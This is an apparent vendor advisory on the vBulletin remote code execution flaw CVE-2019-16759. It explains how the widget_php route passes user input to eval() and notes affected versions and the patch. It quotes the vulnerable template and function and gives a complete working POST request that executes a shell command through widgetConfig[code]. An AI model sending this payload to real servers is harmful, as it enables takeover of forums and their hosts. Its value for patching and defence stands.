Tens of Thousands of vBulletin Forums Wildly Being Exploited (CVE-2019-16759)
A criticalremote code execution (RCE) vulnerability affecting one of the widely used internet forum software vBulletin vulnerabilities has been publicly disclosed. The Vbulletin vulnerability is identified with CVE-2019-16759. It allows an attacker to execute any command on the website, like uploading malware, uploading shells, or tampering with the website’s code. Researchers and attackers have known, utilized, and sold this vulnerability for years. Therefore, A good vulnerability management tool can solve these problems.
Technical Details of Vbulletin Vulnerability:
The vulnerability resides in how vBulletin’s PHP widget file of the forum software package accepts configurations via the URL parameters and parses them on the server without proper safety checks. vBulletin’s PHP widgets are rendering at run-time and used to create dynamic widgets without accessing the hosting server directly. Vulnerability Management Software can resolve these issues. An attacker can force the website to render arbitrary widgets using the Ajax/render/widget_php route and execute any arbitrary code. Below are the contents of the file ajax/render/widget_php.
<div class="widget-content">
<vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
{vb:raw $evaledPHP}
<vb:else />
<vb:if condition="$user['can_use_sitebuilder']">
<span class="note">{vb:phrase click_edit_to_config_module}</span>
</vb:if>
</vb:if>
</div>
A callback to the evalCode function from the above code executes any command passed in the $code argument. However, This can be of use to execute any command available on the system, open firewall ports, or download and execute files and scripts. The function evalCode is present in includes/vb5/frontend/controller/bbcode.php.
function evalCode($code)
{
ob_start();
// find in: public_html/includes/vb5/frontend/controller/bbcode.php
eval($code);
$output = ob_get_contents();
ob_end_clean();
return $output;
}
A typical POST request executing the ‘id’ command on a vulnerable vBulletin could be:
POST / HTTP/1.1
Host: 192.168.1.12
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3BUpon receiving this request, the server forwards the “id” command to the evalCode function and returns its response to the client. However, Manipulating the argument widgetConfig as part of a parameter thus leads to command execution.
Publicly available PoC:
A proof-of-concept code is publicly available for this vulnerability. Since the release of the PoC, this vulnerability wildlyexploited, and many users have reported attacks on their forums using it. Also, a botnet is utilizing this discloses vBulletin vulnerability exploit to secure vulnerable servers so that they cannot be useful to other attackers. The botnet hacks into a vulnerable server with the exploit and then uses it to modify the evalCode function. In the source code file, it requires a password to execute commands.
Thousands of websites use this forum software, including organizations. Like Pearl Jam, NASA, EA, STEAM, Houston Texans, Sony Pictures, Zynga, and more.
Affected Versions by Vbulletin Vulnerability :
All vBulletin forum versions 5. x through 5.5.4.
Impact of Vbulletin Vulnerability:
This vulnerability allows an attacker to execute arbitrary code on the affected system.
Solution:
An official patch is present for Vbulletin Vulnerability. Therefore, Apply the latest Security patches available for download from the vendor.
